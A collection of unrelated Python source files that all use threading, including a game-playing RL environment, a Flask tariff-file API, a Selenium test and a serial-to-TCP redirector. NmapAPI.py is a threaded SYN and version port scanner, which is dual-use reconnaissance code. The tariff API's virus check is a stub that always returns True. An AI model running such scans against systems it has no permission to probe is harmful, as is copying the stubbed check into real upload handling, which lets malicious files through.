self.LastAction = 0
result_frame = self.get_frame()
done = self.isDone(result_frame)
main_menu = self.isMainMenu(result_frame)
self.close_advertise_window()
score = self.LastScore
if self.step_count % 5 == 0:
score = self.get_score(result_frame)
# score = self.get_score(result_frame)
if score <= self.LastScore:
self.same_score_count += 1
if self.same_score_count > 150:
self.back_to_menu()
else:
self.same_score_count = 0
reward = (score - self.LastScore) * 5 \
+ 0.005*self.LastAction \
- self.same_score_count * 0.005
self.LastScore = score
if done:
reward = score - self.LastScore
#reward = -1*(100-self.LastScore)
current_observation = self.__get_observation(result_frame)
self.frame_mixer.stack_frame(current_observation)
if self.step_count % 1 == 0:
print("step: {}, reward: {}, done: {}, score: {}, action: {}"
.format(self.step_count, reward, done, score, action[0]))
mixed_frame = self.frame_mixer.get_mixed_frames()
self.show(mixed_frame, "obs", 313, 200)
return mixed_frame.flatten(), reward, done, self.LastScore
def close(self):
cv2.destroyAllWindows()
def __get_observation(self, screen):
edge_screen = self.process_img(screen)
return edge_screen
def to_binary(self, img):
retval, threshold = cv2.threshold(img, 127, 1, cv2.THRESH_BINARY)
return np.array(threshold)
def render(self):
return
def get_frame(self):
screen = grab_screen(region=(0, 0, 312, 578))
return screen
def process_img(self, image):
# convert to gray
processed_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# cut unused area
y=self.capture_y
x=self.capture_x
h=self.capture_h
w=self.capture_w
processed_img = processed_img[y:y+h, x:x+w]
processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
#processed_img = cv2.GaussianBlur(processed_img, (5, 5), 0)
processed_img = cv2.resize(processed_img, (self.obs_w, self.obs_h), cv2.INTER_AREA)
return processed_img
def get_score(self, image):
x = 154-50
y = 136-50
w = 100
h = 100
score_image = image[y:y + h, x:x + w]
score = read_score.read(score_image)
if abs(score - self.LastScore) >= 10:
score = self.LastScore
return score
def isDone(self, original_img):
if self.mean_bgr(original_img[574, 10]) <= 4:
return True
else:
return False
def isMainMenu(self, original_img):
if self.mean_bgr(original_img[475, 288]) >= 254 \
and self.mean_bgr(original_img[466, 24]) >= 254:
return True
else:
return False
def mean_bgr(self, pixel):
sum = 0
for i in range(3):
sum += pixel[i]
sum /= 3
return sum
def close_advertise_window(self):
frame = self.get_frame()
done = self.isDone(frame)
main_menu = self.isMainMenu(frame)
while done and not main_menu:
print('done: {}, main menu: {}'.format(done, main_menu))
time.sleep(0.5)
self.click(250, 163)
self.click(260, 142)
self.mouse_move_to_center()
frame = self.get_frame()
done = self.isDone(frame)
main_menu = self.isMainMenu(frame)
def back_to_menu(self):
self.click(22, 60)
time.sleep(1)
self.click(153,353)
time.sleep(1)
def show(self, img, title, x=400, y=500):
cv2.imshow(title, img)
cv2.moveWindow(title, x, y)
cv2.waitKey(1)
def mouse_up(self):
threading.Thread(target=pyautogui.mouseUp).start()
# pyautogui.mouseUp()
def mouse_down(self):
self.mouse_move_to_center()
# threading.Thread(target=pyautogui.mouseDown).start()
pyautogui.mouseDown()
def mouse_move_to_center(self):
# threading.Thread(target=pyautogui.moveTo, args=[155, 350]).start()
pyautogui.moveTo(155, 350)
def click(self, x=155, y=350):
# threading.Thread(target=pyautogui.click, args=[x, y]).start()
pyautogui.click(x, y)
|
repl.py
|
"""Interact with a Fish REPL.
"""
import os
import sys
import subprocess
from subprocess import PIPE
import time
from threading import Thread
import tempfile
try:
from queue import Queue
except ImportError:
from Queue import Queue
def write_thread(q, f):
while True:
data = q.get()
f.write(data)
f.flush()
def read_thread(f, q):
while True:
data = f.read(1)
q.put(data)
def write(f):
q = Queue()
t = Thread(target=write_thread, args=(q, f))
t.daemon = True
t.start()
return q
def read(f):
q = Queue()
t = Thread(target=read_thread, args=(f, q))
t.daemon = True
t.start()
return q
def q_until_null(q):
ba = bytearray()
while True:
c = q.get()
if c == b'\0':
return bytes(ba)
ba.append(c[0])
class Fish:
"""A Fish instance running a custom REPL in a subprocess.
Each instance of this class has its own subprocess, with its own
state (variables, loaded functions, etc).
"""
def __init__(self):
homedir = tempfile.mkdtemp(prefix="vf-fish-home")
self.homedir = homedir
# Start Fish up with our custom REPL. We don't use the built-in
# REPL because if we run Fish non-interactively we can't tell
# the difference between Fish waiting for input and whatever
# command we ran waiting for something else, and if we run it
# in a pty we'd have to correctly handle the fish_prompt, fish
# echoing back our input (and possibly even syntax highlighting
# it), and so on.
self.subp = subprocess.Popen(
(
subprocess.check_output(('which', 'fish')).strip(),
os.path.join(os.path.dirname(__file__), 'repl.fish'),
),
stdin=PIPE, stdout=PIPE, stderr=PIPE,
env={'HOME': homedir},
)
# We read and write to/from stdin/out/err in threads, to prevent
# deadlocks (see the warning in the subprocess docs).
self.stdin_q = write(self.subp.stdin)
self.stdout_q = read(self.subp.stdout)
self.stderr_q = read(self.subp.stderr)
def run(self, cmd, expected_exit_codes=(0,)):
"""Run a command on the REPL.
The command can do anything except read from standard input
(because there's currently no way for the test case to write
into it) or print a null byte (since that's how the REPL signals
that the command has finished).
:param cmd: The command to run.
:type cmd: str|bytes
:param expected_exit_codes: The exit codes you expect the
to produce.
:type expected_exit_codes: Iterable[int]
:return: Standard output, standard error.
:rtype: Tuple[bytes, bytes]
"""
if isinstance(cmd, str):
cmd = cmd.encode('utf8')
self.stdin_q.put(cmd)
self.stdin_q.put(b'\0')
output = q_until_null(self.stdout_q)
error = q_until_null(self.stderr_q)
status = int(q_until_null(self.stdout_q).decode('utf8'))
if status not in expected_exit_codes:
sys.stdout.write(output)
sys.stderr.write(error)
raise ValueError("Expected command to exit with {}, got {}".format(
expected_exit_codes, status
))
return output, error
if __name__ == "__main__":
# If invoked directly, executes a bunch of simple test commands.
# This is to make
f = Fish()
print(f.run("echo 1"))
print(f.run("echo 1 >&2"))
print(f.run("set foo bar"))
print(f.run("echo $foo"))
print(f.run("false"))
|
camera.py
|
from threading import Thread
import numpy as np
import cv2
import imutils
import time
class Camera:
def __init__(self, src=0):
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
time.sleep(1)
Thread(target=self.update, args=()).start()
print("[init] Camera")
def update(self):
while True:
if self.stopped:
return
(self.grabbed, self.frame) = self.stream.read()
def read(self):
return self.frame
def stop(self):
self.stopped = True
|
taricapi.py
|
from gevent import monkey # noqa: E402 # pylint: disable=C0411, C0412, C0413
monkey.patch_all() # noqa: E402 # pylint: disable=C0411, C0413
import datetime
import hashlib
import io
import json
from logging.config import dictConfig
import re
import signal
import threading
import uuid
from elasticapm.contrib.flask import ElasticAPM
from flask import Flask, render_template, make_response, request, Response
from flask.logging import create_logger
from gevent.pywsgi import WSGIServer
import gevent
from IPy import IP
from lxml import etree
import requests
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
from apifiles3 import write_file
from apifiles3 import remove_temp_taric_file
from apifiles3 import rename_taric_file
from apifiles3 import save_temp_taric_file
from apifiles3 import stream_taric_file
from apifiles3 import get_taric_index_file
from apifiles3 import get_taric_filepath
from apifiles3 import get_file_list
from apifiles3 import get_file_size
from apifiles3 import read_file
from apifiles3 import file_exists
from apifiles3 import md5
from apifiles3 import modification_date
from config import (
API_ROOT,
APIKEYS,
APIKEYS_UPLOAD,
WHITELIST,
WHITELIST_UPLOAD,
PORT,
LOGGING,
NUM_PROXIES,
REQUIRE_AUTH_FOR_READS,
SENTRY_DSN,
ELASTIC_APM_TOKEN,
ELASTIC_APM_URL,
ENVIRONMENT,
GA_TRACKING_ID,
GA_ENDPOINT,
)
# Use apifile for file system, apifiles3 for AWS S3
dictConfig(LOGGING)
app = Flask(__name__, static_url_path='/static', static_folder='static')
logger = create_logger(app)
# -----------------------
# HTTP HEADERS / API KEYS
# -----------------------
def get_apikey(request):
apikey = ""
if request.headers.get("X-API-KEY", None):
apikey = request.headers.get("X-API-KEY")
logger.info("Api key is in header")
else:
logger.info("No api key in header")
return apikey
def get_remoteaddr(request):
if request.environ.get("HTTP_X_FORWARDED_FOR") is None:
logger.info("Remote addresses are %s", request.environ["REMOTE_ADDR"])
remoteaddrs = request.environ["REMOTE_ADDR"].split(",")
else:
logger.info("Remote addresses are %s", request.environ["HTTP_X_FORWARDED_FOR"])
remoteaddrs = request.environ["HTTP_X_FORWARDED_FOR"].split(",")
if len(remoteaddrs) > NUM_PROXIES:
logger.warning("Additional remote addresses stripped (possible spoofing)")
remoteaddrs = remoteaddrs[-NUM_PROXIES:]
return remoteaddrs
def in_whitelist(remoteaddrs):
for addr in remoteaddrs:
for wlip in WHITELIST:
logger.debug("%s %s", addr, wlip)
if addr in IP(wlip):
return True
return False
def in_whitelist_upload(remoteaddrs):
for addr in remoteaddrs:
for wlip in WHITELIST_UPLOAD:
logger.debug("%s %s", addr, wlip)
if addr in IP(wlip):
return True
return False
def in_apikeys(apikey):
hashed_apikey = str(hashlib.sha256(apikey.encode("ascii")).hexdigest())
try:
return hashed_apikey in APIKEYS
except ValueError:
return False
def in_apikeys_upload(apikey):
hashed_apikey = hashlib.sha256(apikey.encode("ascii")).hexdigest()
try:
return hashed_apikey in APIKEYS_UPLOAD
except ValueError:
return False
def is_auth(request):
if REQUIRE_AUTH_FOR_READS:
apikey = get_apikey(request)
remoteaddr = get_remoteaddr(request)
return in_apikeys(apikey) and in_whitelist(remoteaddr)
return True
def is_auth_upload(request):
apikey = get_apikey(request)
remoteaddrs = get_remoteaddr(request)
return in_apikeys_upload(apikey) and in_whitelist_upload(remoteaddrs)
# ---------------------------
# URL Parameter validation
# Dates as ISO8601 YYYY-MM-DD
# Files as YYSSSS
# ---------------------------
def is_valid_date(date):
return re.match(r"^\d{4}-\d\d-\d\d$", date)
def is_valid_datetime(date):
return re.match(r"^\d{4}-\d\d-\d\d(T\d\d:\d\d:\d\d(\.\d\d\d)?)?$", date)
def is_valid_seq(seq):
return re.match(r"^\d{6}$", seq)
def is_virus_checked(file):
# TODO
return True
def is_schema_validated(xmlfile):
logger.debug("VALIDATING %s", xmlfile)
xsd_doc = etree.parse("taric3.xsd")
xsd = etree.XMLSchema(xsd_doc)
try:
xml = etree.parse(io.BytesIO(read_file(xmlfile)))
except Exception: # pylint: disable=W0703
logger.info("Unable to parse file as XML")
return False
if not xsd.validate(xml):
logger.info("XML Failed validation")
logger.debug("%s", xsd.error_log)
else:
logger.info("XML validates against taric3 schema")
return xsd.validate(xml)
# ------------------
# Create index entry
# ------------------
def create_index_entry(seq):
index_entry = {
"id": int(seq),
"issue_date": modification_date(get_taric_filepath(seq)),
"url": API_ROOT + "taricfiles/" + seq,
"md5": md5(get_taric_filepath(seq)),
"size": get_file_size(get_taric_filepath(seq)),
}
return index_entry
# ----------------
# Google Analytics
# ----------------
def _send_to_google_analytics(
requester_ip, request_host, request_path, request_headers
):
logger.debug('Sending to Google Analytics %s: %s...', request_host, request_path)
requests.post(
GA_ENDPOINT,
data={
'v': '1',
'tid': GA_TRACKING_ID,
'cid': str(uuid.uuid4()),
't': 'pageview',
'uip': requester_ip,
'dh': request_host,
'dp': request_path,
'ds': 'public-tariffs-api',
'dr': request_headers.get('referer', ''),
'ua': request_headers.get('user-agent', ''),
},
)
logger.info("sent to ga")
# --------------------------------
# Rebuild master file index (JSON)
# --------------------------------
def rebuild_index(nocheck):
def _rebuild_index():
if not file_exists(get_taric_index_file()) or nocheck:
logger.info("*** Rebuilding file index... ***")
all_deltas = []
files = get_file_list(None)
logger.info("%s", files)
for file in files:
# build entry for file just uploaded
# TODO (possibly) Add Metadata generation -> then could have api /taricfilemd/...
# TODO - combine with individual update_index..
f = file["Key"]
f = f[f.rindex("/") + 1 :] # remove folder prefix
logger.info("Found file %s", f)
if f.startswith("TEMP_"):
logger.info("Removing temporary file %s", f)
seq = f[5:-4] # remove TEMP_ file prefix and .xml extension
remove_temp_taric_file(seq)
else:
if is_valid_seq(f[:-4]): # ignore non taric files
seq = f[:-4] # remove .xml extension
all_deltas.append(create_index_entry(seq))
logger.debug("%s delta files listed after update", str(len(all_deltas)))
# persist updated index
all_deltass = json.dumps(all_deltas)
write_file(get_taric_index_file(), all_deltass)
logger.info("Index rebuild complete")
logger.debug("Starting thread to rebuild index.")
threading.Thread(target=_rebuild_index).start()
@app.route("/api/v1/rebuildindex", methods=["POST"])
def rebuild_index_controller():
if not is_auth_upload(request):
logger.info("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
rebuild_index(True)
return Response("202 index is being rebuilt", status=202)
# -------------------------------
# Update master file index (JSON)
# -------------------------------
def update_index(seq):
all_deltas = json.loads(read_file(get_taric_index_file()))
logger.debug(
"%s delta files listed in %s", str(len(all_deltas)), get_taric_index_file()
)
# build entry for file just uploaded
# TODO (possibly) Add Metadata file generation -> then could have api /taricfilesmd/...
# if the file was overwritten, just update the index, else append
existing = [d for d in all_deltas if d["id"] == int(seq)]
if len(existing) > 0:
logger.info("File %s overwritten", seq)
i = 0
for d in all_deltas:
logger.debug("%s", d)
if d["id"] == int(seq):
all_deltas[i] = create_index_entry(seq)
i = i + 1
else:
all_deltas.append(create_index_entry(seq))
logger.debug("%s delta files listed after update", str(len(all_deltas)))
# persist updated index
all_deltass = json.dumps(all_deltas)
write_file(get_taric_index_file(), all_deltass)
# ---------------------------------------------
# index page - could be used for pings / checks
# ---------------------------------------------
@app.route("/check")
def check():
logger.debug("%s", request.headers)
logger.debug("%s", request.environ)
message = (
"Request from "
+ get_apikey(request)
+ " @ "
+ " ".join(get_remoteaddr(request))
)
return render_template("check.html", message=message)
@app.route("/healthcheck")
def healthcheck():
return Response(
"""
<?xml version="1.0" encoding="UTF-8"?>
<pingdom_http_custom_check>
<status>OK</status>
</pingdom_http_custom_check>
""",
status=200,
headers={
"Content-Type": "text/xml",
"Cache-Control": "no-cache, no-store, must-revalidate",
},
)
@app.route("/")
def hello():
return render_template("index.html")
# --------------------------------------------------------------------------------------------
# API to retrieve list of delta files (for a date or defaults to yesterday to get latest file)
# NB using today would provide files loaded today
# but no guarantee that the list may change (i.e. extend) later due to further files
# --------------------------------------------------------------------------------------------
@app.route("/api/v1/taricdeltas/<date>", methods=["GET"])
@app.route("/api/v1/taricdeltas/", defaults={"date": ""}, methods=["GET"])
@app.route("/api/v1/taricdeltas", defaults={"date": ""}, methods=["GET"])
def taricdeltas(date):
# Default to yesterday
if date == "" or date is None:
yesterday = datetime.datetime.now() - datetime.timedelta(days=1)
date = yesterday.strftime("%Y-%m-%d")
logger.debug("defaulted date to %s", date)
if not is_valid_date(date):
logger.debug("date is invalid")
return Response("Bad request [invalid date] (400)", status=400)
if not is_auth(request):
logger.debug("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
logger.debug("date is %s", date)
# All Taric files uploaded are stored in the index
# Find files that have the issue date the same as the requested date
# Output the response filtered by the date
all_deltas = json.loads(read_file(get_taric_index_file()))
logger.debug(
"%s delta files listed in %s", str(len(all_deltas)), get_taric_index_file()
)
deltas_on_date = [d for d in all_deltas if d["issue_date"].startswith(date)]
if len(deltas_on_date) == 0:
logger.debug("No delta files available for date %s", date)
return Response("404 Not found", status=404)
logger.debug("%s delta files for date %s", str(len(deltas_on_date)), date)
deltas_json = json.dumps(deltas_on_date)
r = make_response(deltas_json)
r.headers.set("Content-Type", "application/json")
return r
# -----------------------------------------
# API to retrieve contents of specific file
# -----------------------------------------
@app.route("/api/v1/taricfiles/<seq>", methods=["GET"])
@app.route("/api/v1/taricfiles", defaults={"seq": ""}, methods=["GET"])
def taricfiles(seq):
if not is_auth(request):
logger.debug("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
if not is_valid_seq(seq):
logger.debug("seq is invalid")
return Response("400 Bad request [invalid seq]", status=400)
body_generator = stream_taric_file(seq)
if body_generator is None:
logger.debug("Requested file not found %s", seq)
return Response("404 Taric file does not exist", status=404)
return Response(
body_generator,
mimetype="text/xml",
headers={"Content-Length": get_file_size(get_taric_filepath(seq))},
)
# --------------------------------------------------------------------
# API to upload new taric file
# File in the API is identified by seq regardless of it's source name
# File modification time can be set using ?modtime=yyyy-mm-ddThh:mm:ss
# --------------------------------------------------------------------
@app.route("/api/v1/taricfiles/<seq>", methods=["POST"])
@app.route("/api/v1/taricfiles", defaults={"seq": ""}, methods=["POST"])
def taricfiles_upload(seq):
modtime = None
if not is_auth_upload(request):
logger.debug("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
if not is_valid_seq(seq):
logger.debug("seq is invalid")
return Response("400 Bad request [invalid seq]", status=400)
if "file" not in request.files:
logger.debug("No file uploaded")
return Response("400 No file uploaded", status=400)
# file is that attached in the POST request
file = request.files["file"]
if not file or file.filename == "":
logger.debug("No file uploaded")
return Response("400 No file uploaded", status=400)
logger.debug("file uploaded is %s", file.filename)
if not request.args.get("modtime") is None:
if not is_valid_datetime(request.args.get("modtime")):
logger.debug(
"Invalid file modification timestamp specified %s",
request.args.get("modtime"),
)
return Response(
"400 Invalid file modification timestamp specified", status=400
)
else:
modtime = request.args.get("modtime")
logger.debug("file mod time is %s", modtime)
# Save the uploaded XML file as temporary
temp_file_name = save_temp_taric_file(file, seq)
# TODO - should virus check ..
if not is_virus_checked(file.read()):
logger.debug("File failed virus check")
remove_temp_taric_file(seq)
return Response("400 Failed virus check", status=400)
# Validate XML against XSD
if not is_schema_validated(temp_file_name):
logger.debug("File failed schema check")
remove_temp_taric_file(seq)
return Response("400 Failed schema check", status=400)
# Rename the temporary XML file and update the index - used by the deltas API
try:
rename_taric_file(seq, modtime)
update_index(seq)
except IOError as exc:
logger.error("Error saving file %s.xml: %s", seq, str(exc))
return Response("500 Error saving file", status=500)
return Response("200 OK File uploaded", status=200)
def get_server():
if SENTRY_DSN:
sentry_sdk.init(
dsn=SENTRY_DSN, integrations=[FlaskIntegration()],
)
@app.after_request
def add_x_robots(response): # pylint: disable=W0612
response.headers['X-Robots-Tag'] = 'noindex, nofollow'
response.headers[
'Strict-Transport-Security'
] = "max-age=31536000; includeSubDomains"
if GA_TRACKING_ID:
gevent.spawn(
_send_to_google_analytics,
request.remote_addr,
request.host_url,
request.path,
request.headers,
)
return response
elastic_apm_url = ELASTIC_APM_URL
elastic_apm_secret_token = ELASTIC_APM_TOKEN
elastic_apm = (
{
'SERVICE_NAME': 'public-tariffs-api',
'SECRET_TOKEN': elastic_apm_secret_token,
'SERVER_URL': elastic_apm_url,
'ENVIRONMENT': ENVIRONMENT,
}
if elastic_apm_url and elastic_apm_secret_token
else {}
)
if elastic_apm:
app.config['ELASTIC_APM'] = elastic_apm
ElasticAPM(app)
server = WSGIServer(("0.0.0.0", PORT), app, log=app.logger)
return server
def main():
rebuild_index(False)
server = get_server()
gevent.signal_handler(signal.SIGTERM, server.stop)
gevent.signal_handler(signal.SIGTERM, server.stop)
server.serve_forever()
gevent.get_hub().join()
if __name__ == "__main__":
main()
|
test_selenium.py
|
import unittest
import threading
from selenium import webdriver
from app import create_app, db
from models.role import Role
from models.user import User
from models.category import Category
from utils.fake_util import FakeUtil
class SeleniumTestCase(unittest.TestCase):
client = None
@classmethod
def setUpClass(cls):
try:
cls.client = webdriver.Chrome('./chromedriver')
except Exception:
pass
if not cls.client:
return
cls.app = create_app('test')
cls.app_context = cls.app.app_context()
cls.app_context.push()
# 禁止日志
import logging
logger = logging.getLogger('werkzeug')
logger.setLevel('ERROR')
db.create_all()
Role.insert_roles()
Category.insert_categories()
FakeUtil.generate_fake_users(10)
FakeUtil.generate_fake_articles(10)
admin_role = Role.query.filter_by(name='Administrator').first()
admin = User(email='singledog@gmail.com', username='john',
password='dog', role=admin_role, confirmed=True)
db.session.add(admin)
db.session.commit()
threading.Thread(target=cls.app.run).start()
@classmethod
def tearDownClass(cls):
if not cls.client:
return
# 关闭 Flask 服务器和浏览器
cls.client.get('http://localhost:5000/shutdown')
cls.client.close()
db.drop_all()
db.session.remove()
cls.app_context.pop()
def setUp(self):
if not self.client:
self.skipTest('Web browser not available')
def tearDown(self):
pass
def test_admin_home_page(self):
import re
self.client.get('http://localhost:5000/')
self.assertTrue(re.search('Stranger', self.client.page_source))
self.client.find_element_by_link_text('Log In').click()
self.assertTrue('Log In' in self.client.page_source)
self.client.find_element_by_name('email').send_keys('singledog@gmail.com')
self.client.find_element_by_name('password').send_keys('dog')
self.client.find_element_by_name('submit').click()
self.assertTrue(re.search('john', self.client.page_source))
|
NmapAPI.py
|
import nmap
import threading
from tqdm import tqdm
from CoreUtils.Debug import Debug_Print
from Configuration.Configuration import APP_CONFIGURATION
class Nmapper:
def __init__(self):
self.scanner = nmap.PortScanner()
self.count = 0
self.flag = 0
def _quick_scan(self, target, port):
try:
self.scanner.scan(hosts=target, ports=str(port), arguments="-sS", sudo=True, timeout=5)
except Exception as exception:
Debug_Print("\033[1;31m[-] Scan Failed: %s!"%str(exception))
self.count -= 1
return
protocol = self.scanner[target].all_protocols()[0]
state = None
try:
state = self.scanner[target][protocol][port]["state"]
except Exception as exception:
self.count -= 1
return
service = self.scanner[target][protocol][port]["name"]
tqdm.write("\033[1;32m[Hit] %s %s %s %s"%(str(target), str(port), str(service), str(state)))
self.count -= 1
def _full_scan(self, target, port):
try:
self.scanner.scan(hosts=target, ports=str(port), arguments="-sV", sudo=True, timeout=10)
except Exception as exception:
Debug_Print("\033[1;31m[-] Scan Failed: %s!"%str(exception))
self.count -= 1
return
protocol = self.scanner[target].all_protocols()[0]
state = None
try:
state = self.scanner[target][protocol][port]["state"]
except Exception as exception:
self.count -= 1
return
service = self.scanner[target][protocol][port]["name"]
product = self.scanner[target][protocol][port]["product"] if state == "open" else ""
version = self.scanner[target][protocol][port]["version"] if state == "open" else ""
tqdm.write("\033[1;32m[Hit] %s %s %s %s %s %s"%(str(target), str(port), str(service), str(state), str(product), str(version)))
self.count -= 1
def Scan(self, target, port, scantype):
function = None
portlist = []
if scantype == "quick":
function = self._quick_scan
elif scantype == "full":
function = self._full_scan
else:
tqdm.write("\033[1;31m[-]What ScanType You Want Choose? ")
return
if port == "common":
portlist = APP_CONFIGURATION["EnterprisePorts"]
elif port == "all":
portlist = [x+1 for x in range(65535)]
elif port == "key":
portlist = APP_CONFIGURATION["KeyPorts"]
else:
try:
portlist = [int(x) for x in port.split(",")]
except Exception as exception:
tqdm.write("\033[1;31m[-]Please Input Port Correctly: %s"%str(exception))
return
self.flag = len(portlist)
if function is not None and len(portlist) > 0:
portlist = tqdm(portlist)
for port in portlist:
while True:
if self.count < APP_CONFIGURATION["ThreadCount"]:
thread = threading.Thread(target=function, args=([target, port]))
thread.start()
self.flag -= 1
self.count += 1
if self.flag <= 10 or int(port) == 6379:
thread.join()
break
else:
pass
portlist.set_description("Processing")
return
|
serializers.py
|
import traceback
from threading import Thread
from rest_framework import serializers
from rest_framework.serializers import raise_errors_on_nested_writes
from rest_framework.utils import model_meta
from .models import *
from parsers .main_parsers import *
class AnalysisDetailSerializer(serializers.ModelSerializer):
class Meta:
model = Analysis
fields = ('id', 'patient_name', 'date_uploaded', 'analysis', 'processing_completed', 'processing_result')
def create(self, validated_data):
raise_errors_on_nested_writes('create', self, validated_data)
ModelClass = self.Meta.model
info = model_meta.get_field_info(Analysis)
many_to_many = {}
for field_name, relation_info in info.relations.items():
if relation_info.to_many and (field_name in validated_data):
many_to_many[field_name] = validated_data.pop(field_name)
try:
instance = ModelClass._default_manager.create(**validated_data)
except TypeError:
tb = traceback.format_exc()
msg = (
'Got a `TypeError` when calling `%s.%s.create()`. '
'This may be because you have a writable field on the '
'serializer class that is not a valid argument to '
'`%s.%s.create()`. You may need to make the field '
'read-only, or override the %s.create() method to handle '
'this correctly.\nOriginal exception was:\n %s' %
(
ModelClass.__name__,
ModelClass._default_manager.name,
ModelClass.__name__,
ModelClass._default_manager.name,
self.__class__.__name__,
tb
)
)
raise TypeError(msg)
# Save many-to-many relationships after the instance is created.
if many_to_many:
for field_name, value in many_to_many.items():
field = getattr(instance, field_name)
field.set(value)
Thread(target=parse_analysis, args=(instance, )).start()
return instance
def parse_analysis(analysis):
path = analysis.analysis.path.replace('\\', '\\\\')
analysis.processing_result = str(parse_pdf(path))
analysis.processing_completed = True
analysis.save()
class AnalysisListSerializer(serializers.ModelSerializer):
class Meta:
model = Analysis
fields = ('id', 'patient_name', 'date_uploaded', 'processing_completed')
|
multiprocess1.py
|
import os, time, random
from multiprocessing import Process, Pool
def process():
print('current Process %s start ...' % os.getpid())
pid = os.fork()
if pid < 0:
print('error in fork')
elif pid == 0:
print('I am child process(%s) and my parent process is (%s)' % (os.getpid(), os.getppid()))
else:
print('I (%s) created a child process (%s)' % (os.getpid(), pid))
# 子进程要执行的代码
def run_proc(name):
print('Child process %s (%s) Running....' % (name, os.getpid()))
def def_multiprocess():
print('Parent process %s.' % os.getpid())
for i in range(5):
p = Process(target=run_proc, args=(str(i)))
print('Process will start')
p.start()
p.join()
print('Process end.')
def run_task(name):
print('Task %s (pid=%s) is running...' %(name, os.getpid()))
time.sleep(random.random()*3)
print('Task %s end.' % name)
if __name__ == '__main__':
print('Current process %s.' % os.getpid())
p = Pool(processes=3)
for i in range(5):
p.apply_async(run_task, args=str(i))
print('Waiting for all subprocesses done...')
p.close()
p.join()
print('All subprocesses done.')
|
rfc2217_server.py
|
#!/usr/bin/env python
# (C) 2009 Chris Liechti <cliechti@gmx.net>
# redirect data from a TCP/IP connection to a serial port and vice versa
# using RFC 2217
import sys
import os
import threading
import time
import socket
import serial
import serial.rfc2217
import logging
class Redirector:
def __init__(self, serial_instance, socket, debug=None):
self.serial = serial_instance
self.socket = socket
self._write_lock = threading.Lock()
self.rfc2217 = serial.rfc2217.PortManager(
self.serial,
self,
logger = (debug and logging.getLogger('rfc2217.server'))
)
self.log = logging.getLogger('redirector')
def statusline_poller(self):
self.log.debug('status line poll thread started')
while self.alive:
time.sleep(1)
self.rfc2217.check_modem_lines()
self.log.debug('status line poll thread terminated')
def shortcut(self):
"""connect the serial port to the TCP port by copying everything
from one side to the other"""
self.alive = True
self.thread_read = threading.Thread(target=self.reader)
self.thread_read.setDaemon(True)
self.thread_read.setName('serial->socket')
self.thread_read.start()
self.thread_poll = threading.Thread(target=self.statusline_poller)
self.thread_poll.setDaemon(True)
self.thread_poll.setName('status line poll')
self.thread_poll.start()
self.writer()
def reader(self):
"""loop forever and copy serial->socket"""
self.log.debug('reader thread started')
while self.alive:
try:
data = self.serial.read(1) # read one, blocking
n = self.serial.inWaiting() # look if there is more
if n:
data = data + self.serial.read(n) # and get as much as possible
if data:
# escape outgoing data when needed (Telnet IAC (0xff) character)
data = serial.to_bytes(self.rfc2217.escape(data))
self._write_lock.acquire()
try:
self.socket.sendall(data) # send it over TCP
finally:
self._write_lock.release()
except socket.error, msg:
self.log.error('%s' % (msg,))
# probably got disconnected
break
self.alive = False
self.log.debug('reader thread terminated')
def write(self, data):
"""thread safe socket write with no data escaping. used to send telnet stuff"""
self._write_lock.acquire()
try:
self.socket.sendall(data)
finally:
self._write_lock.release()
def writer(self):
"""loop forever and copy socket->serial"""
while self.alive:
try:
data = self.socket.recv(1024)
if not data:
break
self.serial.write(serial.to_bytes(self.rfc2217.filter(data)))
except socket.error, msg:
self.log.error('%s' % (msg,))
# probably got disconnected
break
self.stop()
def stop(self):
"""Stop copying"""
self.log.debug('stopping')
if self.alive:
self.alive = False
self.thread_read.join()
self.thread_poll.join()
if __name__ == '__main__':
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] port",
description = "RFC 2217 Serial to Network (TCP/IP) redirector.",
epilog = """\
NOTE: no security measures are implemented. Anyone can remotely connect
to this service over the network.
Only one connection at once is supported. When the connection is terminated
it waits for the next connect.
""")
parser.add_option("-p", "--localport",
dest = "local_port",
action = "store",
type = 'int',
help = "local TCP port",
default = 2217
)
parser.add_option("-v", "--verbose",
dest = "verbosity",
action = "count",
help = "print more diagnostic messages (option can be given multiple times)",
default = 0
)
(options, args) = parser.parse_args()
if len(args) != 1:
parser.error('serial port name required as argument')
if options.verbosity > 3:
options.verbosity = 3
level = (
logging.WARNING,
logging.INFO,
logging.DEBUG,
logging.NOTSET,
)[options.verbosity]
logging.basicConfig(level=logging.INFO)
logging.getLogger('root').setLevel(logging.INFO)
logging.getLogger('rfc2217').setLevel(level)
# connect to serial port
ser = serial.Serial()
ser.port = args[0]
ser.timeout = 3 # required so that the reader thread can exit
logging.info("RFC 2217 TCP/IP to Serial redirector - type Ctrl-C / BREAK to quit")
try:
ser.open()
except serial.SerialException, e:
logging.error("Could not open serial port %s: %s" % (ser.portstr, e))
sys.exit(1)
logging.info("Serving serial port: %s" % (ser.portstr,))
settings = ser.getSettingsDict()
# reset control line as no _remote_ "terminal" has been connected yet
ser.setDTR(False)
ser.setRTS(False)
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind( ('', options.local_port) )
srv.listen(1)
logging.info("TCP/IP port: %s" % (options.local_port,))
while True:
try:
connection, addr = srv.accept()
logging.info('Connected by %s:%s' % (addr[0], addr[1]))
connection.setsockopt( socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
ser.setRTS(True)
ser.setDTR(True)
# enter network <-> serial loop
r = Redirector(
ser,
connection,
options.verbosity > 0
)
try:
r.shortcut()
finally:
logging.info('Disconnected')
r.stop()
connection.close()
ser.setDTR(False)
ser.setRTS(False)
# Restore port settings (may have been changed by RFC 2217 capable
# client)
ser.applySettingsDict(settings)
except KeyboardInterrupt:
break
except socket.error, msg:
logging.error('%s' % (msg,))
logging.info('--- exit ---')
|
Utils.py
|
#
# Cython -- Things that don't belong
# anywhere else in particular
#
from __future__ import absolute_import
try:
from __builtin__ import basestring
except ImportError:
basestring = str
import os
import sys
import re
import io
import codecs
from contextlib import contextmanager
modification_time = os.path.getmtime
def cached_function(f):
cache = {}
uncomputed = object()
def wrapper(*args):
